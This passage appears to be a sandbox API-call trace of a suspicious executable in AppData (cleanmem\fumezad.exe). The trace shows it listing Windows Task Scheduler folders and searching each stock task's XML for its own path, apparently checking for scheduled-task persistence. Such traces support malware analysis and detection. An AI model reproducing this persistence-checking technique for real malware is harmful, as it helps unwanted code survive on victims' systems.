D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n true\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 1\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {343D770D-7788-47c2-B62A-B7C4CED925CB}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.106] IUnknown:Release (This=0x297020) returned 0x0 [0229.106] IUnknown:Release (This=0x296ed0) returned 0x0 [0229.106] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0229.107] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.107] IUnknown:Release (This=0x296ed0) returned 0x0 [0229.107] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.107] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.107] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0229.110] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=4) returned 0x0 [0229.110] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0229.110] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="AutoWake") returned 0x0 [0229.110] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\AutoWake\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)\r\n \r\n \r\n \r\n true\r\n PT1M\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {E51DFD48-AA36-4B45-BB52-E831F02E8316}\r\n \r\n \r\n") returned 0x0 [0229.112] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\AutoWake\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)\r\n \r\n \r\n \r\n true\r\n PT1M\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {E51DFD48-AA36-4B45-BB52-E831F02E8316}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.141] IUnknown:Release (This=0x297020) returned 0x0 [0229.141] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0229.141] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="GadgetManager") returned 0x0 [0229.141] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\GadgetManager\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {FF87090D-4A9A-4f47-879B-29A80C355D61}\r\n \r\n \r\n \r\n") returned 0x0 [0229.143] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\GadgetManager\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {FF87090D-4A9A-4f47-879B-29A80C355D61}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.171] IUnknown:Release (This=0x297020) returned 0x0 [0229.171] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0229.171] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="SessionAgent") returned 0x0 [0229.171] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SessionAgent\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)\r\n \r\n \r\n \r\n true\r\n PT15S\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {45F26E9E-6199-477F-85DA-AF1EDfE067B1}\r\n \r\n \r\n") returned 0x0 [0229.173] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SessionAgent\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)\r\n \r\n \r\n \r\n true\r\n PT15S\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {45F26E9E-6199-477F-85DA-AF1EDfE067B1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.201] IUnknown:Release (This=0x297020) returned 0x0 [0229.201] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0229.201] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="SystemDataProviders") returned 0x0 [0229.201] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SystemDataProviders\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)\r\n \r\n \r\n \r\n true\r\n PT30S\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {7CCA6768-8373-4D28-8876-83E8B4E3A969}\r\n \r\n \r\n") returned 0x0 [0229.203] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SystemDataProviders\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)\r\n \r\n \r\n \r\n true\r\n PT30S\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {7CCA6768-8373-4D28-8876-83E8B4E3A969}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.232] IUnknown:Release (This=0x297020) returned 0x0 [0229.232] IUnknown:Release (This=0x296ed0) returned 0x0 [0229.232] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0229.233] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.233] IUnknown:Release (This=0x296ed0) returned 0x0 [0229.233] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.233] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.233] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296f00) returned 0x0 [0229.235] IRegisteredTaskCollection:get_Count (in: This=0x296f00, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.235] IRegisteredTaskCollection:get_Item (in: This=0x296f00, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297070) returned 0x0 [0229.235] IRegisteredTask:get_Name (in: This=0x297070, pName=0x12dea0 | out: pName=0x12dea0*="SvcRestartTask") returned 0x0 [0229.235] IRegisteredTask:get_Xml (in: This=0x297070, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)\r\n 1.0\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n sc.exe\r\n start sppsvc\r\n \r\n \r\n") returned 0x0 [0229.237] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)\r\n 1.0\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n sc.exe\r\n start sppsvc\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.268] IUnknown:Release (This=0x297070) returned 0x0 [0229.268] IUnknown:Release (This=0x296f00) returned 0x0 [0229.268] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296f00) returned 0x0 [0229.269] ITaskFolderCollection:get_Count (in: This=0x296f00, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.269] IUnknown:Release (This=0x296f00) returned 0x0 [0229.269] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.269] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x20, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.269] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0229.270] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=0) returned 0x0 [0229.270] IUnknown:Release (This=0x296ee0) returned 0x0 [0229.270] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0229.271] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.271] IUnknown:Release (This=0x296ee0) returned 0x0 [0229.271] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.271] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x21, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.271] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0229.273] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.273] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297040) returned 0x0 [0229.273] IRegisteredTask:get_Name (in: This=0x297040, pName=0x12dea0 | out: pName=0x12dea0*="SR") returned 0x0 [0229.273] IRegisteredTask:get_Xml (in: This=0x297040, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n 2005-06-14T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT23H\r\n false\r\n false\r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d srrstr.dll,ExecuteScheduledSPPCreation\r\n \r\n \r\n") returned 0x0 [0229.274] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n 2005-06-14T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT23H\r\n false\r\n false\r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d srrstr.dll,ExecuteScheduledSPPCreation\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.302] IUnknown:Release (This=0x297040) returned 0x0 [0229.302] IUnknown:Release (This=0x296ee0) returned 0x0 [0229.302] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0229.303] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.303] IUnknown:Release (This=0x296ee0) returned 0x0 [0229.303] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.303] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.303] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0229.304] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.304] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0229.304] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="Interactive") returned 0x0 [0229.304] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n 1.0\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n Microsoft\\Windows\\Task Manager\\Interactive\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 5\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {855fec53-d2e4-4999-9e87-3414e9cf0ff4}\r\n \r\n \r\n \r\n") returned 0x0 [0229.306] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n 1.0\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n Microsoft\\Windows\\Task Manager\\Interactive\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 5\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {855fec53-d2e4-4999-9e87-3414e9cf0ff4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.327] IUnknown:Release (This=0x297030) returned 0x0 [0229.327] IUnknown:Release (This=0x296ee0) returned 0x0 [0229.327] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0229.328] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.328] IUnknown:Release (This=0x296ee0) returned 0x0 [0229.328] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.328] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x23, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.328] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0229.331] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=2) returned 0x0 [0229.331] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0229.331] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="IpAddressConflict1") returned 0x0 [0229.331] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict1\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4198]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem\r\n \r\n \r\n") returned 0x0 [0229.333] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict1\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4198]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.365] IUnknown:Release (This=0x297020) returned 0x0 [0229.365] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0229.365] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="IpAddressConflict2") returned 0x0 [0229.365] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict2\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n 2006-02-23T16:27:43\r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4199]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem\r\n \r\n \r\n") returned 0x0 [0229.368] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict2\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n 2006-02-23T16:27:43\r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4199]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.400] IUnknown:Release (This=0x297020) returned 0x0 [0229.400] IUnknown:Release (This=0x296ed0) returned 0x0 [0229.400] ITaskFolder:GetFolders (in: 